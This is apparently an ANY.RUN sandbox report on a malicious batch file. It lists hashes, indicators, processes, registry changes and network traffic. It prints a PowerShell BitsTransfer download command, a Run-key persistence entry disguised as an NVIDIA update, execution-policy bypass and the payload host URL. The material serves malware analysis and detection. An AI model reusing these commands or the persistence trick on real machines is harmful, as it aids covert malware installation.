File name:

final.bat

Full analysis: https://app.any.run/tasks/c1a43f25-bc9c-40a0-a061-88088e2ec392
Verdict: Malicious activity
Analysis date: June 03, 2025, 05:45:06
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with CRLF line terminators
MD5:

FDC36DE62917345F78CF5873833E309C

SHA1:

9B49476BA3A2DA41DF9420979F2A0187BA7EB761

SHA256:

13F789F8A222A84BA892CD88EF1485D7B6A166C58A2177A93FEB85A545F61566

SSDEEP:

24:6qKA8Ljsj9tkoQCLoQUBq25C7X4ON12inH/e8VQFqQtY/:NwkL2q25CAiHm8Ck

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Probably downloads file via BitsAdmin

      • powershell.exe (PID: 5568)
      • powershell.exe (PID: 6476)
      • powershell.exe (PID: 4976)

    • Probably downloads file via BitsAdmin (POWERSHELL)

      • powershell.exe (PID: 4976)

    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 6564)
      • wscript.exe (PID: 7952)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6644)
      • powershell.exe (PID: 7584)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5772)
      • wscript.exe (PID: 6564)
      • wscript.exe (PID: 7952)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 5772)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 7288)

    • Downloads file from URI via Powershell

      • powershell.exe (PID: 7928)

    • The process executes VB scripts

      • cmd.exe (PID: 5772)

    • The process executes Powershell scripts

      • wscript.exe (PID: 6564)
      • wscript.exe (PID: 7952)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6644)
      • powershell.exe (PID: 7584)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6564)

    • Uses TASKKILL.EXE to kill process

      • powershell.exe (PID: 7584)

  • INFO

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4976)
      • powershell.exe (PID: 7288)

    • Disables trace logs

      • powershell.exe (PID: 7928)

    • Checks proxy server information

      • powershell.exe (PID: 7928)
      • slui.exe (PID: 900)

    • Changes the registry key values via Powershell

      • cmd.exe (PID: 5772)

    • Manual execution by a user

      • wscript.exe (PID: 7952)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7584)
      • powershell.exe (PID: 6644)

    • Reads the software policy settings

      • slui.exe (PID: 900)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
153
Monitored processes
27
Malicious processes
2
Suspicious processes
6

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe powershell.exe no specs wscript.exe no specs powershell.exe no specs conhost.exe no specs wscript.exe no specs powershell.exe no specs conhost.exe no specs taskkill.exe no specs taskkill.exe no specs addinprocess32.exe no specs addinprocess32.exe no specs addinprocess32.exe no specs addinprocess32.exe no specs addinprocess32.exe no specs addinprocess32.exe no specs addinprocess32.exe no specs addinprocess32.exe no specs addinprocess32.exe no specs addinprocess32.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
32"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
236taskkill /IM 7952 /FC:\Windows\System32\taskkill.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
240"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
404"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
900C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3168"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
4424\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4976powershell -Command "Start-BitsTransfer -Source **** -Destination 'C:\Users\admin\AppData\Roaming\nvidia_sys\logs\secound.txt'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
5056"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
5552"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Exit code:
4294967295
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
Total events
38 140
Read events
38 139
Write events
1
Delete events
0

Modification events

(PID) Process:(7800) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:NVIDIA_Update
Value:
wscript.exe "C:\Users\admin\AppData\Roaming\nvidia_sys\logs\s-nvs_update.vbs"
Executable files
0
Suspicious files
1
Text files
18
Unknown types
0

Dropped files

PID
Process
Filename
Type
4976powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pashbuk4.a02.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6476powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cxbgxtlb.jpm.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4976powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_poayi5qj.1wf.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6476powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:E643B6FB46ABCE5E7B56C6DCB4A7A232
SHA256:4EB0007C81D33BFF20C4BEBC3BB6A8F260CDBD9CA7A5B3783087317A78D6E994
5568powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_tubbrkve.0wb.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7928powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_n4bvbada.qxx.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7928powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cluzuuyh.f1w.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7288powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_grbips2a.bgx.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7288powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4tnl0wb3.5m3.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6476powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hxdueuht.ho5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
30
TCP/UDP connections
50
DNS requests
22
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4164
svchost.exe
GET
200
23.216.77.28:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
POST
200
20.190.160.17:443
https://login.live.com/RST2.srf
unknown
xml
10.3 Kb
whitelisted
POST
200
20.190.160.17:443
https://login.live.com/RST2.srf
unknown
xml
10.3 Kb
whitelisted
POST
200
20.190.159.2:443
https://login.live.com/RST2.srf
unknown
xml
11.0 Kb
whitelisted
4164
svchost.exe
GET
200
2.23.181.156:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
POST
200
40.126.31.3:443
https://login.live.com/RST2.srf
unknown
xml
10.3 Kb
whitelisted
POST
200
20.190.159.73:443
https://login.live.com/RST2.srf
unknown
xml
11.0 Kb
whitelisted
HEAD
200
216.198.79.193:443
https://service-omega-snowy.vercel.app/final.txt
unknown
GET
200
64.29.17.193:443
https://service-omega-snowy.vercel.app/final.txt
unknown
text
606 b
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4164
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
6544
svchost.exe
20.190.160.14:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4164
svchost.exe
23.216.77.28:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
3812
svchost.exe
239.255.255.250:1900
whitelisted
4164
svchost.exe
2.23.181.156:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
login.live.com
  • 20.190.160.14
  • 20.190.160.20
  • 40.126.32.68
  • 20.190.160.22
  • 20.190.160.131
  • 40.126.32.138
  • 40.126.32.140
  • 20.190.160.3
whitelisted
google.com
  • 142.250.74.206
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
crl.microsoft.com
  • 23.216.77.28
  • 23.216.77.6
  • 2.20.245.137
  • 2.20.245.139
whitelisted
www.microsoft.com
  • 2.23.181.156
  • 2.23.246.101
whitelisted
service-omega-snowy.vercel.app
  • 216.198.79.193
  • 64.29.17.193
unknown
client.wns.windows.com
  • 172.211.123.248
  • 172.211.123.249
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Cloud infrastructure to build app (vercel .app)
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
A Network Trojan was detected
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
final.bat